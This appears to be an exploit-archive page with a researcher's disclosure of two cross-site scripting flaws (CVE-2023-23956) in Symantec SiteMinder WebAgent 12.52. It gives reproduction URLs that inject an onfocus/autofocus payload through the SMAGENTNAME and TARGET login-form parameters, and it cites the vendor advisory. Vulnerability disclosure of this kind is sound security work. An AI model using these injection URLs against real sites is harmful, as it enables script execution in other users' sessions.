Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Symantec SiteMinder WebAgent 12.52 Cross Site Scripting[6]
- Authored by Harshit Joshi[7]
-
Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.
- advisories | CVE-2023-23956[8]
- SHA-256 |
1e3c42d3d0c7abf35ae520a6ff70b622c2dce6badcb46b8db94cb2c61004e9d6
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version: 12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
Vulnerability Details:
---------------------
*Impact:*
This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.
*Steps to Reproduce:*
*First:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
File Tags
- ActiveX[19] (932)
- Advisory[20] (81,454)
- Arbitrary[21] (16,100)
- BBS[22] (2,859)
- Bypass[23] (1,703)
- CGI[24] (1,024)
- Code Execution[25] (7,188)
- Conference[26] (678)
- Cracker[27] (841)
- CSRF[28] (3,324)
- DoS[29] (23,249)
- Encryption[30] (2,363)
- Exploit[31] (51,285)
- File Inclusion[32] (4,196)
- File Upload[33] (957)
- Firewall[34] (821)
- Info Disclosure[35] (2,729)
- Intrusion Detection[36] (886)
- Java[37] (3,004)
- JavaScript[38] (844)
- Kernel[39] (6,593)
- Local[40] (14,401)
- Magazine[41] (586)
- Overflow[42] (12,623)
- Perl[43] (1,423)
- PHP[44] (5,130)
- Proof of Concept[45] (2,336)
- Protocol[46] (3,568)
- Python[47] (1,514)
- Remote[48] (30,554)
- Root[49] (3,571)
- Rootkit[50] (506)
- Ruby[51] (609)
- Scanner[52] (1,633)
- Security Tool[53] (7,857)
- Shell[54] (3,165)
- Shellcode[55] (1,211)
- Sniffer[56] (893)
- Spoof[57] (2,190)
- SQL Injection[58] (16,243)
- TCP[59] (2,395)
- Trojan[60] (687)
- UDP[61] (885)
- Virus[62] (664)
- Vulnerability[63] (31,616)
- Web[64] (9,588)
- Whitepaper[65] (3,746)
- x86[66] (961)
- XSS[67] (17,721)
- Other[68]
File Archives
- June 2023[69]
- May 2023[70]
- April 2023[71]
- March 2023[72]
- February 2023[73]
- January 2023[74]
- December 2022[75]
- November 2022[76]
- October 2022[77]
- September 2022[78]
- August 2022[79]
- July 2022[80]
- Older[81]
Systems
- AIX[82] (428)
- Apple[83] (1,981)
- BSD[84] (373)
- CentOS[85] (57)
- Cisco[86] (1,921)
- Debian[87] (6,768)
- Fedora[88] (1,691)
- FreeBSD[89] (1,244)
- Gentoo[90] (4,321)
- HPUX[91] (879)
- iOS[92] (346)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (67)
- Linux[96] (45,967)
- Mac OS X[97] (685)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (483)
- RedHat[101] (13,425)
- Slackware[102] (941)
- Solaris[103] (1,610)
- SUSE[104] (1,444)
- Ubuntu[105] (8,688)
- UNIX[106] (9,251)
- UnixWare[107] (186)
- Windows[108] (6,558)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]